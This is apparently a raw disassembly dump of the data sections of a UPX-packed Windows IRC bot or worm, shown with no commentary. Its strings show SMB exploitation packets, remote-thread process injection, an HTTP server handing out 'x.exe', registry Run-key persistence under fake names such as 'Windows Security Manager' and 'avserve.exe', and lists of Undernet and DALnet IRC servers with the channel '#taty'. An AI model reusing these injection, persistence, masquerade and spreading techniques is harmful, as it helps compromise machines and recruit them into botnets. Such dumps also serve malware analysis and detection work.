dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_31505768 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_315057D4 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31505848 dd 0 ; DATA XREF: sub_315011C0+3A0�o
dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31505906 dd 1004600h ; DATA XREF: sub_315011C0+289�r
dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31505940 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_315011C0+41B�o
; sub_315011C0+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_315059B8: ; DATA XREF: sub_315011C0+44A�o
jmp short loc_315059C0
; ---------------------------------------------------------------------------
jmp short loc_315059C2
; ---------------------------------------------------------------------------
align 10h
loc_315059C0: ; CODE XREF: UPX0:loc_315059B8�j
; DATA XREF: sub_315011C0+5C�o
pop esp
pop esp
loc_315059C2: ; CODE XREF: UPX0:315059BA�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_315059CC dd 1CEC8166h ; DATA XREF: sub_315011C0+D�r
dword_315059D0 dd 0E4FF07h ; DATA XREF: sub_315011C0+1C�r
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31501727+62�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31501727+39�o
align 10h
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31501727+2A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31501727+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31501727+8�o
; sub_31501D89+EA�o
align 4
aUterm13i db 'uterm13i',0 ; DATA XREF: sub_315017AF:loc_31501894�o
; UPX0:31501D28�o ...
align 4
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_315017AF+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_315017AF:loc_315017F6�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_315017AF+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_315017AF+18�o
align 4
dword_31505A84 dd 0E9F3F5h ; DATA XREF: sub_31501A62+105�o
aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31501A62+F9�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_31501A62+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31501A62+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
a_exe db '.exe',0 ; DATA XREF: sub_31501A62+55�o
; sub_315025D1+4B�o ...
align 10h
aGet db 'GET',0 ; DATA XREF: sub_31501A62+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:31501D13�o
align 10h
aUser32 db 'user32',0 ; DATA XREF: sub_31501D89+F1�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_31501D89+E3�o
align 10h
aWininet db 'wininet',0 ; DATA XREF: sub_31501D89+DC�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_31501D89+CF�o
align 10h
aU14 db 'u14',0 ; DATA XREF: sub_31501D89+BD�o
aU13i db 'u13i',0 ; DATA XREF: sub_31501D89+B1�o
align 4
aU13 db 'u13',0 ; DATA XREF: sub_31501D89+A5�o
aU12 db 'u12',0 ; DATA XREF: sub_31501D89+99�o
aU11 db 'u11',0 ; DATA XREF: sub_31501D89+8D�o
aU10 db 'u10',0 ; DATA XREF: sub_31501D89+81�o
aU9 db 'u9',0 ; DATA XREF: sub_31501D89+75�o
align 10h
aU8 db 'u8',0 ; DATA XREF: sub_31501D89+69�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_31501D89+5D�o
align 4
aU12x db 'u12x',0 ; DATA XREF: sub_31501D89+51�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_31501D89+45�o
align 4
aU10x db 'u10x',0 ; DATA XREF: sub_31501D89+3B�o
align 4
aU13ix db 'u13ix',0 ; DATA XREF: sub_31501D89+22�o
align 4
asc_31505B7C db 0Dh,0Ah,0 ; DATA XREF: sub_31501F46+124�o
align 10h
aUseridUnix db ' : USERID : UNIX : ',0 ; DATA XREF: sub_31501F46+104�o
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_31502252+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_31501B9B+23�o
; sub_31502523+5F�o ...
align 4
aSystemUpdate db 'System Update',0 ; DATA XREF: sub_31501B9B+1C�o
; sub_315025D1+87�o ...
align 4
aXjalpgncplisib db 'xjalpgncplisibz',0 ; DATA XREF: sub_3150269D+57�o
; sub_3150269D+8A�o
align 10h
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_3150269D+32�o
aClient db 'Client',0 ; DATA XREF: sub_3150269D+BC�o
; sub_3150269D+F8�o
align 4
aId db 'ID',0 ; DATA XREF: sub_3150269D+37�o
; sub_3150269D+75�o
align 4
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_31502523+4E�o
align 4
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_31502523+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_31502523+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_31502523+39�o
align 4
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_31502523+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_31502523+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_31502523+24�o
align 4
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_31502523+1D�o
align 10h
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_31502523+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_31502523+F�o
align 10h
asc_31505CE0: ; DATA XREF: sub_315025D1+56�o
; sub_315035E3+49�o
unicode 0, <\>,0
a1: ; DATA XREF: sub_3150269D+B7�o
unicode 0, <1>,0
dword_31505CE8 dd 206h, 2400h, 31415352h, 800h, 10001h, 0A495BDEFh, 0DD499F8Eh
; DATA XREF: sub_3150281A+3A�o
dd 64DB1F45h, 0DE5B5C5h, 23CBE2AAh, 63639922h, 7318481Ch
dd 749AC3F2h, 4D855620h, 0AD0FE1CCh, 691506D3h, 0A8FD8D37h
dd 700B1698h, 45504FCEh, 324A3914h, 5C10E3EFh, 0DFBDD847h
dd 371EBA84h, 8B817380h, 7D4A0DF5h, 2DFE92E0h, 0C699C9C5h
dd 9C85E020h, 6A5068BDh, 8250B629h, 7F42C334h, 1C980811h
dd 9CE7B7B2h, 3D77899Dh, 0A4D3971Ah, 0A58D5029h, 8D463A96h
dd 1612E8FCh, 44AF10EBh, 0D0F84570h, 0B178966Ah, 0EB51439Fh
dd 7086A827h, 0DE098A39h, 0C1A1C214h, 0BF167A53h, 611A85C4h
dd 9829E70Fh, 8966209Eh, 0CB1FE53h, 0ECCA9407h, 0A11E75A3h
dd 0B4E8F91Dh, 1A4ECBC5h, 69D7F0DBh, 8C1A8739h, 18C67B94h
dd 3EB38213h, 0E0424BBFh, 8400EB67h, 0AA60B737h, 22D7D8B3h
dd 7A650480h, 86FF4BA6h, 0F6458558h, 56EEF96Eh, 32002FC9h
dd 0B7A63B4Ah, 0EBD3D87Ah
aCont db 'cont',0 ; DATA XREF: sub_31502801+3�o
align 4
off_31505E04 dd offset dword_31505FF0 ; DATA XREF: UPX0:315034A3�r
; UPX0:315034F5�r
dd offset aGraz_at_eu_und ; "graz.at.eu.undernet.org"
dd offset aFlanders_be_eu ; "flanders.be.eu.undernet.org"
dd offset aCaen_fr_eu_und ; "caen.fr.eu.undernet.org"
dd offset aBrussels_be_eu ; "brussels.be.eu.undernet.org"
dd offset aLosAngeles_ca_ ; "los-angeles.ca.us.undernet.org"
dd offset aWashington_dc_ ; "washington.dc.us.undernet.org"
dd offset aLondon_uk_eu_u ; "london.uk.eu.undernet.org"
dd offset aLia_zanet_net ; "lia.zanet.net"
dd offset aGaspode_zanet_ ; "gaspode.zanet.org.za"
dd offset aDiemen_nl_eu_u ; "diemen.nl.eu.undernet.org"
dd offset aLulea_se_eu_un ; "lulea.se.eu.undernet.org"
dd offset aCoins_dal_net ; "coins.dal.net"
dd offset aBroadway_ny_us ; "broadway.ny.us.dal.net"
dd offset aOzbytes_dal_ne ; "ozbytes.dal.net"
dd offset aVancouver_dal_ ; "vancouver.dal.net"
dd offset aViking_dal_net ; "viking.dal.net"
dd offset aCed_dal_net ; "ced.dal.net"
dd offset aQis_md_us_dal_ ; "qis.md.us.dal.net"
aQis_md_us_dal_ db 'qis.md.us.dal.net',0 ; DATA XREF: UPX0:31505E4C�o
align 4
aCed_dal_net db 'ced.dal.net',0 ; DATA XREF: UPX0:31505E48�o
aViking_dal_net db 'viking.dal.net',0 ; DATA XREF: UPX0:31505E44�o
align 10h
aVancouver_dal_ db 'vancouver.dal.net',0 ; DATA XREF: UPX0:31505E40�o
align 4
aOzbytes_dal_ne db 'ozbytes.dal.net',0 ; DATA XREF: UPX0:31505E3C�o
aBroadway_ny_us db 'broadway.ny.us.dal.net',0 ; DATA XREF: UPX0:31505E38�o
align 4
aCoins_dal_net db 'coins.dal.net',0 ; DATA XREF: UPX0:31505E34�o
align 4
aLulea_se_eu_un db 'lulea.se.eu.undernet.org',0 ; DATA XREF: UPX0:31505E30�o
align 4
aDiemen_nl_eu_u db 'diemen.nl.eu.undernet.org',0 ; DATA XREF: UPX0:31505E2C�o
align 4
aGaspode_zanet_ db 'gaspode.zanet.org.za',0 ; DATA XREF: UPX0:31505E28�o
align 4
aLia_zanet_net db 'lia.zanet.net',0 ; DATA XREF: UPX0:31505E24�o
align 4
aLondon_uk_eu_u db 'london.uk.eu.undernet.org',0 ; DATA XREF: UPX0:31505E20�o
align 4
aWashington_dc_ db 'washington.dc.us.undernet.org',0 ; DATA XREF: UPX0:31505E1C�o
align 4
aLosAngeles_ca_ db 'los-angeles.ca.us.undernet.org',0 ; DATA XREF: UPX0:31505E18�o
align 4
aBrussels_be_eu db 'brussels.be.eu.undernet.org',0 ; DATA XREF: UPX0:31505E14�o
aCaen_fr_eu_und db 'caen.fr.eu.undernet.org',0 ; DATA XREF: UPX0:31505E10�o
aFlanders_be_eu db 'flanders.be.eu.undernet.org',0 ; DATA XREF: UPX0:31505E0C�o
aGraz_at_eu_und db 'graz.at.eu.undernet.org',0 ; DATA XREF: UPX0:31505E08�o
dword_31505FF0 dd 63736F6Dh, 612D776Fh, 6B6F7664h, 722E7461h
; DATA XREF: UPX0:off_31505E04�o
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31506000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31506000 dd 75h ; DATA XREF: UPX1:315083F1�o
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31502C92+1C�o
align 10h
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31502C92+C�o
align 4
aUserS8S db 'USER %s 8 * :%s',0Dh,0Ah,0 ; DATA XREF: sub_31502DC7+1C4�o
align 10h
aAlready db 'already',0 ; DATA XREF: sub_31502DC7+133�o
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_31502DC7+D9�o
; sub_31502DC7+165�o
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_31502DC7+9C�o
align 10h
aPongS db 'PONG%s',0Dh,0Ah,0 ; DATA XREF: sub_31503009+4F�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_31503009+C�o
; sub_3150308C:loc_3150312E�o
align 4
a451 db '451',0 ; DATA XREF: sub_3150308C+8E�o
aJoinS db 'JOIN %s',0Dh,0Ah,0 ; DATA XREF: sub_3150308C+16�o
align 4
aQuitS db 'QUIT %s',0Dh,0Ah,0 ; DATA XREF: sub_3150315E+2C�o
align 10h
aPrivmsgSS db 'PRIVMSG %s %s',0Dh,0Ah,0 ; DATA XREF: sub_315032D5+3B�o
aTaty db '#taty',0 ; DATA XREF: UPX0:31503545�o
align 4
a13 db '13',0 ; DATA XREF: UPX0:3150343B�o
align 4
a_: ; DATA XREF: UPX0:31503430�o
unicode 0, <_>,0
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_315035E3+13�o
align 4
aJoin db 'JOIN',0 ; DATA XREF: sub_315036FD+2E8�o
align 4
aQ: ; DATA XREF: sub_315036FD+2C3�o
unicode 0, <q>,0
aDD13SD db '%d,%d,13%s,%d',0 ; DATA XREF: sub_315036FD+29D�o
align 10h
aI: ; DATA XREF: sub_315036FD+253�o
unicode 0, <i>,0
asc_31506114: ; DATA XREF: sub_315036FD+23A�o
unicode 0, <|>,0
aE: ; DATA XREF: sub_315036FD+146�o
unicode 0, <e>,0
a1D db '-1,%d',0 ; DATA XREF: sub_315036FD+78�o
align 4
dd 9 dup(0)
dword_31506148 dd 0 ; DATA XREF: sub_31501A62+C7�r
; sub_31501B9B+80�w
dword_3150614C dd 0 ; DATA XREF: sub_31501B9B+2D�w
; sub_315036FD+297�r
dword_31506150 dd 0 ; DATA XREF: sub_31501A62+79�r
; sub_31501A62:loc_31501B10�r ...
dword_31506154 dd 44h ; DATA XREF: sub_315017AF+C2�r
; UPX0:31501D33�w ...
dword_31506158 dd 0 ; DATA XREF: sub_31501D75+2�r
; sub_31501D89+33�w
dword_3150615C dd 8 dup(0) ; DATA XREF: sub_31501F46+2E�o
dword_3150617C dd 0 ; DATA XREF: sub_31501B9B+E0�w
; sub_31502252+20�r
dword_31506180 dd 31500000h ; DATA XREF: sub_315017AF+6�r
; UPX0:31501D18�w
dword_31506184 dd 0 ; DATA XREF: sub_31502103+37�o
; sub_3150218B+53�o ...
dword_31506188 dd 0 ; DATA XREF: UPX0:315022EF�w
; UPX0:31502301�w ...
word_3150618C dw 0 ; DATA XREF: sub_3150209F+3B�r
; sub_31502103:loc_31502164�r ...
align 10h
dword_31506190 dd 0 ; DATA XREF: sub_3150269D+25�w
; sub_3150269D+110�w ...
dword_31506194 dd 0 ; DATA XREF: UPX0:315033F8�w
; UPX0:3150352E�w ...
dword_31506198 dd 0 ; DATA XREF: UPX0:loc_31503451�o
; sub_315036FD+E8�r ...
dword_3150619C dd 8 dup(0) ; DATA XREF: UPX0:31503459�o
; sub_315036FD+A�o
dword_315061BC dd 391h dup(0) ; DATA XREF: sub_315036FD+263�o
dd 0C4h, 40h, 74736C01h, 706D6372h, 47010041h, 6F4C7465h
dd 656C6163h, 6F666E49h, 53010041h, 75437465h, 6E657272h
dd 72694474h, 6F746365h, 417972h, 69725701h, 69466574h
dd 100656Ch, 53746547h, 65747379h, 6D69546Dh, 53010065h
dd 65747379h, 6D69546Dh, 466F5465h, 54656C69h, 656D69h
dd 72695601h, 6C617574h, 65657246h, 69560100h, 61757472h
dd 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh, 6C694665h
dd 6D614E65h, 1004165h, 7274736Ch, 69706D63h, 47010041h
dd 79537465h, 6D657473h, 65726944h, 726F7463h, 1004179h
dd 7274736Ch, 41746163h, 6F430100h, 69467970h, 41656Ch
dd 6E695701h, 63657845h, 72430100h, 65746165h, 6C6F6F54h
dd 706C6568h, 6E533233h, 68737061h, 100746Fh, 636F7250h
dd 33737365h, 72694632h, 1007473h, 6D726554h, 74616E69h
dd 6F725065h, 73736563h, 72500100h, 7365636Fh, 4E323373h
dd 747865h, 74736C01h, 79706372h, 49010041h, 7265746Eh
dd 6B636F6Ch, 6E496465h, 6D657263h, 746E65h, 65724301h
dd 45657461h, 746E6576h, 57010041h, 46746961h, 6953726Fh
dd 656C676Eh, 656A624Fh, 1007463h, 656C6544h, 69466574h
dd 41656Ch, 74654701h, 7473614Ch, 6F727245h, 6C010072h
dd 6C727473h, 416E65h, 656C5301h, 1007065h, 7274736Ch
dd 6E797063h, 47010041h, 75437465h, 6E657272h, 6F725074h
dd 73736563h, 65470100h, 6F725074h, 64644163h, 73736572h
dd 6F4C0100h, 694C6461h, 72617262h, 1004179h, 74697257h
dd 6F725065h, 73736563h, 6F6D654Dh, 1007972h, 736F6C43h
dd 6E614865h, 656C64h, 65704F01h, 6F72506Eh, 73736563h
dd 65470100h, 646F4D74h, 48656C75h, 6C646E61h, 1004165h
dd 54746547h, 436B6369h, 746E756Fh, 72430100h, 65746165h
dd 6574754Dh, 1004178h, 61657243h, 68546574h, 64616572h
dd 72430100h, 65746165h, 636F7250h, 41737365h, 65530100h
dd 65764574h, 100746Eh, 6E65704Fh, 6E657645h, 1004174h
dd 74697845h, 65726854h, 1006461h, 64616552h, 656C6946h
dd 65470100h, 6C694674h, 7A695365h, 43010065h, 74616572h
dd 6C694665h, 1004165h, 74697845h, 636F7250h, 737365h
dd 0D100h, 0
dd 72430100h, 43747079h, 74616572h, 73614865h, 43010068h
dd 74707972h, 68736148h, 61746144h, 72430100h, 56747079h
dd 66697265h, 67695379h, 7574616Eh, 416572h, 79724301h
dd 65447470h, 6F727473h, 73614879h, 43010068h, 74707972h
dd 74736544h, 4B796F72h, 1007965h, 70797243h, 6C655274h
dd 65736165h, 746E6F43h, 747865h, 79724301h, 63417470h
dd 72697571h, 6E6F4365h, 74786574h, 43010041h, 74707972h
dd 6F706D49h, 654B7472h, 52010079h, 72436765h, 65746165h
dd 4579654Bh, 1004178h, 53676552h, 61567465h, 4565756Ch
dd 1004178h, 51676552h, 79726575h, 756C6156h, 41784565h
dd 65520100h, 65704F67h, 79654B6Eh, 417845h, 67655201h
dd 656C6544h, 61566574h, 4165756Ch, 65520100h, 6F6C4367h
dd 654B6573h, 41010079h, 74726F62h, 74737953h, 68536D65h
dd 6F647475h, 416E77h, 0DE00h, 0F800h, 74610100h, 100696Fh
dd 6E617461h, 69730100h, 6301006Eh, 100736Fh, 5F48455Fh
dd 6C6F7270h, 100676Fh, 78435F5Fh, 61724678h, 6148656Dh
dd 656C646Eh, 73010072h, 68637274h, 73010072h, 70637274h
dd 73010079h, 61637274h, 5F010074h, 65637865h, 685F7470h
dd 6C646E61h, 337265h, 72747301h, 727473h, 6E617201h, 73010064h
dd 646E6172h, 656D0100h, 7970636Dh, 74730100h, 6E656C72h
dd 656D0100h, 7465736Dh, 0E90000h, 13C0000h, 77010000h
dd 69727073h, 4166746Eh, 65470100h, 726F4674h, 6F726765h
dd 57646E75h, 6F646E69h, 46010077h, 57646E69h, 6F646E69h
dd 1004177h, 57746547h, 6F646E69h, 72685477h, 50646165h
dd 65636F72h, 64497373h, 0F40000h, 1500000h, 49010000h
dd 7265746Eh, 4F74656Eh, 556E6570h, 416C72h, 746E4901h
dd 656E7265h, 65704F74h, 100416Eh, 65746E49h, 74656E72h
dd 64616552h, 656C6946h, 6E490100h, 6E726574h, 65477465h
dd 6E6F4374h, 7463656Eh, 74536465h, 657461h, 10000h, 16400h
dd 12FF00h, 0FF0008FFh, 2FF0073h, 0DFF00h, 0FF0001FFh
dd 6FFF0039h, 0BFF00h, 0FF0034FFh, 0CFF0017h, 9FF00h, 0FF0004FFh
dd 10FF0013h, 16FF00h, 3FFh, 0
dd 4550h, 2014Ch, 40D3167Eh, 2 dup(0)
dd 10F00E0h, 6010Bh, 3400h, 1200h, 0
dd 1D0Bh, 1000h, 5000h, 31500000h, 1000h, 200h, 4, 0
dd 4, 0
dd 7000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 3B48h, 8Ch, 14h dup(0)
dd 1000h, 1B0h, 6 dup(0)
dd 7865742Eh, 74h, 3310h, 1000h, 3400h, 400h, 3 dup(0)
dd 0E0040020h, 7461642Eh, 61h, 11BDh, 5000h, 1200h, 3800h
dd 3 dup(0)
dd 0C0000040h, 6000h, 3D84h, 652Ch, 0E18BF100h, 76406F8Bh
dd 1C47CCC3h, 46C64646h, 0C140518h, 46473E08h, 0FC000446h
dd 74108410h, 7DFCF9F0h, 1078107Ch, 0E9C0C8B8h, 0D6ACDDF6h
dd 0CF10B6Eh, 20B8AB1Dh, 0BEEB163Bh, 36CC4C5Bh, 0E8EC1993h
dd 6C07012Ah, 0F8A61425h, 83700737h, 103961Ch, 8B9E4B10h
dd 0BB6BA121h, 64DE5753h, 401FF92Bh, 1F6BB057h, 0C208A2h
dd 746858EBh, 0FFDDFFECh, 2F3A7074h, 3732312Fh, 3101302Eh
dd 3030383Ah, 652E652Fh, 0DF6578h, 8FFEDFFFh, 697A6F4Dh
dd 2F616C6Ch, 5DDF2734h, 0B966C933h, 758D01EFh, 0FFFD8B05h
dd 8AFEFB6Dh, 7993C06h, 302C0646h, 88993446h, 0EDE24707h
dd 0DAE80AEBh, 2FFDFFBh, 65622E1Ah, 93712E67h, 1201C999h
dd 0FD91BDFDh, 0BFDD0716h, 72C17FFFh, 0FD42AA68h, 10FDAA66h
dd 0A91C14BAh, 0F3C91A98h, 8608F198h, 6EC7FECFh, 10C37102h
dd 37CB5F90h, 1C965992h, 0E4143A78h, 0EC3E4FB6h, 0A7D7157h
dd 0F345713Ah, 8904F19Dh, 0FBEE748Fh, 9C04F109h, 67B24011h
dd 0B7BFE3F3h, 10F0F63Bh, 0B20BDF1Ch, 0C99B6059h, 14D90125h
dd 0D8F63E59h, 0CA17A004h, 8D2B9171h, 0AC916168h, 1FD9F6B7h
dd 9666611Ah, 0B228111Dh, 9900C850h, 0F6EFDC14h, 5557B6CFh
dd 0A44E1224h, 491291C0h, 54F7ED99h, 6FF67EEEh, 3AC41400h
dd 3A71CBCAh, 0E424FF1Ch, 0CDCF1A21h, 0D9B64FCDh, 2C668FC3h
dd 0FB113F81h, 0DB37CEB0h, 0C383B8FDh, 0A85D12CDh, 251DCBC9h
dd 3FB264ACh, 5A0A24D9h, 0C096A648h, 0D9FB1A14h, 294CFF65h
dd 9CF3EBA7h, 3416E8BAh, 0F57126F4h, 0ECFFFBBDh, 3BF90EFFh
dd 4629EF13h, 0DE5F376Bh, 0A8EC4766h, 0FF21F0AAh, 1179BFFh
dd 0EDFFC5B7h, 0FDE9ECE9h, 0FCE1FCB7h, 0BFEDC999h, 0F5590B7Ch
dd 0F2E9FCFCh, 0FCF7EBFCh, 0D7ABAAF5h, 0FFFF2FFBh, 0AAF934C7h
dd 2A25B459h, 0ACC9662Ah, 0B7819093h, 83639D90h, 9271CDC9h
dd 85F76130h, 3519BF3Fh, 95DA1451h, 2A91720Ah, 0DBECC871h
dd 0D207FFFFh, 80D512A5h, 0AA529AE1h, 2A8D146Fh, 12B9C89Ah
dd 474A9A8Bh, 0DFFFFD58h, 0AB9E59FEh, 0A319DB9Bh, 0A26CEC20h
dd 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h, 0BBDC812h, 1FBFFFCDh
dd 0EB8D2E96h, 9A85D812h, 99D125Ah, 0F8105A9Ah, 0BB6FD397h
dd 492309FFh, 0FEFD7F66h, 5AA98712h, 850295C2h, 51238212h
dd 91046EDBh, 0CFF7CB5Ah, 242E857Bh, 53FFF9BAh, 1872424Dh
dd 0FEA5C853h, 0C7FFFFF8h, 2006206h, 4E204350h, 4F575445h
dd 50204B52h, 52474F52h, 31204D41h, 0D6FB58FFh, 414C17CDh
dd 0A024D4Eh, 646E6957h, 9673776Fh, 20FDBFB6h, 20726F66h
dd 676B0357h, 70756F72h, 611A330Eh, 0EB74B61Fh, 32234D27h
dd 32322158h, 59312E32h, 4E2F6D33h, 20182054h, 6A8B163Ch
dd 0A4CF2325h, 0B06C0773h, 0C2A176Fh, 40023FFh, 20140A11h
dd 376B7D05h, 69EFD46Ah, 534B4C00h, 0DB005053h, 76177923h
dd 0E0088297h, 6E240057h, 0FF736C5Eh, 6F006400h, 73007700h
dd 130743Ah, 0C896DC09h, 398CDEh, 2E1D2335h, 6C89CF07h
dd 0ABDA00C0h, 93DA2008h, 5720324Ch, 0B06C039Fh, 14650EDh
dd 7472346h, 1901E46Eh, 6000640h, 0BFFF0110h, 151F7FFCh
dd 48E0888Ah, 44004F00h, 7A6A1981h, 1C49E4F2h, 2530AF28h
dd 89BE474h, 536710ECh, 75DF5CE1h, 29E5B5CDh, 5C040030h
dd 915ABD07h, 875EEBBh, 2E4D615Ch, 38003607h, 0B1BB6F75h
dd 1B30772Eh, 43EC0049h, 3F3B2400h, 0EC39E403h, 0A2646300h
dd 0E5B7FC83h, 4004DC08h, 0DE00FF16h, 0E00DEh, 4C269F16h
dd 201D848h, 1B284026h, 19FDF70Dh, 6C8B1103h, 70D374D9h
dd 0D977C852h, 9C2A6300h, 0B03B256Bh, 109FDB67h, 1B04480Eh
dd 0DB9F1354h, 5A54AEBAh, 22596326h, 45CBC75Ch, 73FE6907h
dd 58765h, 4810030Bh, 93FF10B8h, 25016AA6h, 19286A01h
dd 0D0B10C39h, 63FF0B11h, 0A89BFFh, 2ED94FC0h, 885D5FF5h
dd 0C91CEB8Ah, 3CE89F11h, 0BD91732Bh, 604810ECh, 0A3F40CD1h
dd 0AF21E460h, 0A00CA0E4h, 0DF0CB10Ch, 191C9h, 40880CA0h
dd 0C93C2300h, 0EC0009F7h, 95000703h, 7C4F4014h, 0D836452Fh
dd 0BF4070h, 0FE134307h, 78136447h, 0AB001385h, 13E9A65Bh
dd 0CF204E78h, 0FF2FF810h, 6180EFEh, 4023C6ABh, 7C840856h
dd 883A4FBAh, 0EE10B943h, 10B801FFh, 9E4F26CCh, 0DAD200Ch
dd 42BCB307h, 0D80F7F3Eh, 0F2700118h, 84E4AF21h, 950F840Fh
dd 93C9000Fh, 7F0200DFh, 0F6C0F84h, 0B0F0955Bh, 6FA89A00h
dd 11812743h, 691F13D9h, 5814DB6Eh, 205058F9h, 46007250h
dd 89F90144h, 32396790h, 15123C6Bh, 81AF0275h, 53412790h
dd 0FF941C00h, 1644395h, 5CC606EBh, 5C73255Ch, 0F37FFF2Fh
dd 24637069h, 1CEC8166h, 0E4FF07h, 65446553h, 69677562h
dd 0F64C6976h, 656CF3FFh, 64416567h, 7473756Ah, 656B6F54h
dd 0EE73176Eh, 4CDB724Fh, 7075126Fh, 756C6156h, 0FF174165h
dd 4FDFB6C5h, 636F2870h, 43347324h, 61766461h, 0FF3F4670h
dd 323369EFh, 6574750Bh, 33316D72h, 65685369h, 2577B715h
dd 72545FFEh, 39577961h, 6572430Fh, 65521E61h, 0DBB9DF6Dh
dd 54056F6Dh, 56140C68h, 75747269h, 0E567415Ch, 5328ADDBh
dd 6B357845h, 4B6E7265h, 0F46897F5h, 4822F3A5h, 83505454h
dd 0DA322040h, 5B12FDEFh, 0D4B4F20h, 6F4B010Ah, 0D9B2446Eh
dd 2D02DDBFh, 7467044Ch, 25203A68h, 0B72F1875h, 28961ED6h
dd 26B97954h, 7E6C70A7h, 69DB6F47h, 15698563h, 0CB2D782Fh
dd 6D6F632Dh, 3D4F7270h, 65CDED8Ah, 0DF5764h, 85BDD247h
dd 5445F2h, 11640266h, 165673D7h, 6D95BFDAh, 0B1637673h
dd 0DC0177D7h, 65DA2DDFh, 5F320F08h, 34317517h, 0CE9A6903h
dd 307F7CDh, 60303132h, 396ECF27h, 7800381Fh, 6E7B0732h
dd 3031C832h, 0D588083Fh, 20EDFDFDh, 455355ABh, 8444952h
dd 658494Eh, 85ED6700h, 3AD89120h, 97BD6425h, 0CBDB1653h
dd 54464FFFh, 45524157h, 6F694D5Ch, 5CB36F73h, 0DD6DDCA7h
dd 75435C0Fh, 56F97272h, 5CEE73B8h, 2B5A7552h, 53AC3E14h
dd 5280ED79h, 77FF21D7h, 64478A18h, 68736166h, 73647A6Eh
dd 612D6C64h, 4953376Dh, 573F6177h, 0A15CD0Eh, 7B296C86h
dd 0DF235742h, 9C6B44B0h, 6120E503h, 20676966h, 0E86EF676h
dd 760BF570h, 32657628h, 64B1649Dh, 53207B9Bh, 1B654410h
